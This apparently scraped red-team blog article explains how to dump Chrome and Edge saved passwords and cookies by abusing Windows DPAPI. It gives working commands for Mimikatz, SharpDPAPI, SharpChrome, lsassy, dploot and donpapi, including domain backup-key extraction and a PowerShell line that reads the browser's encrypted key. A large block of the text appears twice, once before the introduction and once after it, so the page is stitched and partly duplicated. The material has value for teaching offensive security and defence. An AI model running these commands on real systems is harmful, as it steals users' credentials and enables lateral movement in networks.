DPAPI – Backup Key

Mimikatz support remote dumping of the backup key by executing the following command:

    lsadump::backupkeys /system:dc.red.lab /export

Domain Backup Key

The exported backup key can be used in conjunction with the master key of the target user to decrypt the encryption key.

    dpapi::masterkey /in:"C:\Users\peter\AppData\Roaming\Microsoft\Protect\S-1-5-21-955986923-3279314952-43775158-1105\15e65bfa-6f2b-4abc-8199-c53e32c31d6f" /pvk:backupkey.pvk

Decrypt Master Key Mimikatz

Similarly, this activity can be performed by SharpDPAPI. If no .pvk file is specified the key will be displayed in the console.

    dotnet inline-execute SharpDPAPI.exe backupkey /nowrap /server:dc.red.lab

DPAPI Domain Backup Key

    SharpDPAPI.exe backupkey /nowrap /server:dc.red.lab /file:backupkey.pvk

DPAPI Domain Backup Key File

**Non-Domain Joined**

There is sufficient tooling to implement DPAPI operations remotely from a non-domain joined systems. Utilization of lsassy can retrieve various information including master keys. Executing of the following command will retrieve and store master keys into a file.

    lsassy -d purple.lab -u Administrator -p Password123 10.0.1.2 -m rdrleakdiag -M masterkeys

lsassy Master Keys

The master keys file can be imported to dploot, a python implementation of SharpDPAPI, in conjunction with the browser flag. The tool will authenticate with the target host via SMB and will dump credentials and cookies stored in Microsoft Edge and Google Chrome. _dploot_ retrieves the AES key from the “_Local State_” file and then decrypts the credentials stored in the “_Login Data_” file.

    dploot browser -d purple.lab -u Administrator -p Password123 10.0.1.2 -mkfile /home/kali/masterkeys

dploot – Browser Credentials

it is also feasible to harvest master keys from _dploot_ with the _masterkeys_ flag.

    dploot masterkeys -d purple.lab -u Administrator -p Password123 10.0.1.2

dploot – Master key

Similar operations can be performed with donpapi.

    donpapi red/Administrator:Password123@10.0.0.2 -o /home/kali

DonPapi

The majority of the tools discussed in this article following a specific sequence of events. If the tool is executing from a non-domain joined host (aka Linux), an SMB connection is initiated and then contents of the Local State file are read in order to decrypt the AES key before concluding the attack with the decryption of the passwords stored in the Login Data. Tools which are executed in memory from an implant are omitting the SMB connection. Except of CredentialKatz which implements a different approach all the other tools can be considered similar. The following image displays the sequence of events.

DPAPI – Linux

**Post navigation**

Web Browser Stored Credentials

Microsoft introduced Data Protection Application Programming Interface (DPAPI) in Windows environments as a method to encrypt and decrypt sensitive data such as credentials using the _CryptProtectData_ and _CryptUnprotectData_ functions. Browsers such as Chrome and Edge utilize DPAPI to encrypt credentials prior to storage. The master key is stored locally and can be decrypted with the password of the user, which then is used to decrypt DPAPI data blobs.

In the world of red team operations, locations which credentials are stored are always a target as it will allow access to other applications or lateral movement. Organizations which are utilizing Microsoft Edge or Google Chrome for storage the credentials of their users are vulnerable due to the abuse of CryptUnprotectData API (T1555.003). It should be noted that reading credentials stored in browsers doesn’t require any form of elevation and it is challenging for defensive teams to detect due to the high volume of events which are generated in case of monitoring.

Master keys are located in the following path and by default are not visible as these are classified as protected operating system files.

    C:\users\<user>\appdata\roaming\microsoft\protect\<SID>\<MasterKey>

User Master Keys

Mimikatz was the first tool that interacted with DPAPI, and has specific modules to perform decryption operations. However, the Mimikatz encrypted key parser is broken and therefore it can no longer be used to decrypt DPAPI blobs as it fails with a message of _No Alg and/or key handle_. Instead of using Mimikatz, it is feasible to harvest the encrypted key from “_Local State_” by executing the following command from a PowerShell console:

(gc "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Local State" | ConvertFrom-Json).os\_crypt.encrypted\_key

Local State – Encrypted Key

The encrypted key can be ingested in the Mimikatz _dpapi::chrome_ module to decrypt the contents of “_Login Data_“.

    dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /encryptedkey:[EncryptedKey] /unprotect

Mimikatz – DPAPI Decrypt

SharpDPAPI is a C# port of the Mimikatz DPAPI functionality which enables in-memory based execution. Master keys can be retrieved by executing the following command:

    dotnet inline-execute SharpDPAPI.exe masterkeys /rpc

ShaprDPAPI – User Master Keys

SharpDPAPI – GUID & Decryption Keys

SharpChrome is part of the SharpDPAPI and targets sensitive information stored in Chromium based browsers such as Chrome, Edge and Brave. The tool will attempt to read and decrypt the AES key from the “_Local State_” file using the cryptographic function BCrypt. The API _CryptUnprotectData()_ is used to decrypt passwords stored in browsers.

    dotnet inline-execute SharpChrome logins

SharpChrome – DPAPI

An alternative tool called CredentialKatz implements a different method as credentials are dumped directly from the credential manager of Chrome or Edge. This method is more evasive as it attempts to inject into an existing browser process and read credentials and doesn’t utilize DPAPI for decryption. Offline parsing of credentials is also supported via a minidump file. CredentialKatz harvest passwords from credential manager in plain-text by using the _PasswordReuseDetectorImpl_ class.

    CredentialKatz.exe

CredentialKatz

**Domain Backup Key**

In the event that domain administrator access has been achieved the DPAPI backup key can be retrieved from the domain controller to decrypt master keys from any user in the domain. The backup key is stored in the following Active Directory location:

DPAPI – Backup Key

Mimikatz support remote dumping of the backup key by executing the following command:

    lsadump::backupkeys /system:dc.red.lab /export

Domain Backup Key

The exported backup key can be used in conjunction with the master key of the target user to decrypt the encryption key.

    dpapi::masterkey /in:"C:\Users\peter\AppData\Roaming\Microsoft\Protect\S-1-5-21-955986923-3279314952-43775158-1105\15e65bfa-6f2b-4abc-8199-c53e32c31d6f" /pvk:backupkey.pvk

Decrypt Master Key Mimikatz

Similarly, this activity can be performed by SharpDPAPI. If no .pvk file is specified the key will be displayed in the console.

    dotnet inline-execute SharpDPAPI.exe backupkey /nowrap /server:dc.red.lab

DPAPI Domain Backup Key

    SharpDPAPI.exe backupkey /nowrap /server:dc.red.lab /file:backupkey.pvk

DPAPI Domain Backup Key File

**Non-Domain Joined**

There is sufficient tooling to implement DPAPI operations remotely from a non-domain joined systems. Utilization of lsassy can retrieve various information including master keys. Executing of the following command will retrieve and store master keys into a file.

    lsassy -d purple.lab -u Administrator -p Password123 10.0.1.2 -m rdrleakdiag -M masterkeys

lsassy Master Keys

The master keys file can be imported to dploot, a python implementation of SharpDPAPI, in conjunction with the browser flag. The tool will authenticate with the target host via SMB and will dump credentials and cookies stored in Microsoft Edge and Google Chrome. _dploot_ retrieves the AES key from the “_Local State_” file and then decrypts the credentials stored in the “_Login Data_” file.

    dploot browser -d purple.lab -u Administrator -p Password123 10.0.1.2 -mkfile /home/kali/masterkeys

dploot – Browser Credentials

it is also feasible to harvest master keys from _dploot_ with the _masterkeys_ flag.

    dploot masterkeys -d purple.lab -u Administrator -p Password123 10.0.1.2

dploot – Master key

Similar operations can be performed with donpapi.

    donpapi red/Administrator:Password123@10.0.0.2 -o /home/kali

DonPapi

The majority of the tools discussed in this article following a specific sequence of events. If the tool is executing from a non-domain joined host (aka Linux), an SMB connection is initiated and then contents of the Local State file are read in order to decrypt the AES key before concluding the attack with the decryption of the passwords stored in the Login Data. Tools which are executed in memory from an implant are omitting the SMB connection. Except of CredentialKatz which implements a different approach all the other tools can be considered similar. The following image displays the sequence of events.

DPAPI – Linux

**Rate this:**

**Post navigation**

Tag

#google